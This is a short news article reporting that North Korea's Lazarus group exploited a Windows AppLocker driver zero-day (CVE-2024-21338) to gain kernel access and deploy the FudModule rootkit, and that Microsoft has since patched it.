Lazarus Group exploits AppLocker vulnerability, causing havoc undetected – Windows 365 News




Microsoft and its services are constantly under security attacks, and the company is collaborating with government agencies to improve their security.

Unfortunately for Microsoft, another zero-day vulnerability has been found and exploited by hackers.

North Korean hackers have found another exploit that can disable security features

As reported by GovInfoSecurity, the Lazarus hacking group from North Korea has managed to find and use a vulnerability in the Windows AppLocker driver.

By using this exploit, they were able to obtain kernel-level access and turn off the security features of a PC to hide their presence.

The hackers used a previously unknown vulnerability in appid.sys, the driver in charge of enforcing rules on which applications can run on the PC.

This is a dangerous vulnerability, and even Microsoft stated that exploiting it could let a hacker obtain system privileges. After obtaining access, the hackers would deploy their FudModule rootkit.

By using this rootkit, they would disrupt various kernel security mechanisms, thus allowing themselves to operate without being detected.

Luckily, Microsoft was quick to fix this, and the vulnerability is tracked as CVE-2024-21338, so as long as you have the latest security updates installed, you should be safe.


